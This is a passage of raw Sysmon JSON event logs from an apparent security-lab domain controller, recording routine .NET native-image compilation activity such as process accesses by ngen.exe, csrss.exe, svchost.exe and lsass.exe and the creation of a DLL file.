YSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8320,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.537\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-00100BBF0900}\r\nSourceProcessId: 3144\r\nSourceThreadId: 4488\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001027391100}\r\nTargetProcessId: 1192\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.537","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-00100BBF0900}","SourceProcessId":"3144","SourceThreadId":"4488","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001027391100}","TargetProcessId":"1192","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8321,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.537\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001027391100}\r\nTargetProcessId: 1192\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.537","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001027391100}","TargetProcessId":"1192","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8322,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.537\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-001027391100}\r\nTargetProcessId: 1192\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.537","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-001027391100}","TargetProcessId":"1192","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:27","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8323,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 08:07:27.693\r\nProcessGuid: {41C8662E-22BF-5F25-0000-001027391100}\r\nProcessId: 1192\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4a8-0\\XsdBuildTask.dll\r\nCreationUtcTime: 2020-08-01 08:07:27.693","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 08:07:27.693","ProcessGuid":"{41C8662E-22BF-5F25-0000-001027391100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\4a8-0\\XsdBuildTask.dll","CreationUtcTime":"2020-08-01 08:07:27.693","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8324,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.850\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nSourceProcessId: 3060\r\nSourceThreadId: 4352\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.850","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-0010E0B70900}","SourceProcessId":"3060","SourceThreadId":"4352","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.dll+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.DLL+32979|UNKNOWN(00007FFD152E5147)","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8325,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.850\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.850","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8326,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.850\r\nSourceProcessGUID: {41C8662E-21BC-5F25-0000-001060B80900}\r\nSourceProcessId: 4440\r\nSourceThreadId: 1436\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2298-5F25-0000-001079031000}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.850","SourceProcessGUID":"{41C8662E-21BC-5F25-0000-001060B80900}","SourceProcessId":"4440","SourceThreadId":"1436","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2298-5F25-0000-001079031000}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8327,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.865\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00109C5D1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.865","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00109C5D1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a6a54|C:\\Windows\\System32\\RPCRT4.dll+1129f|C:\\Windows\\system32\\lsasrv.dll+25add|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8328,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.865\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-001010540000}\r\nSourceProcessId: 864\r\nSourceThreadId: 104\r\nSourceImage: C:\\Windows\\system32\\lsass.exe\r\nTargetProcessGUID: {41C8662E-22BF-5F25-0000-00109C5D1100}\r\nTargetProcessId: 3408\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nGrantedAccess: 0x1478\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 08:07:27.865","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-001010540000}","SourceProcessId":"864","SourceThreadId":"104","SourceImage":"C:\\Windows\\system32\\lsass.exe","TargetProcessGUID":"{41C8662E-22BF-5F25-0000-00109C5D1100}","TargetProcessId":"3408","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","GrantedAccess":"0x1478","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\lsasrv.dll+25d17|C:\\Windows\\system32\\lsasrv.dll+26ded|C:\\Windows\\system32\\lsasrv.dll+25b95|C:\\Windows\\SYSTEM32\\SspiSrv.dll+11a2|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 08:07:28","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 08:07:28","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8329,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 08:07:27.975\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-21BC-5F25-0000-0010E0B70900}\r\nTargetProcessId: 3060\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\NGenTask.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 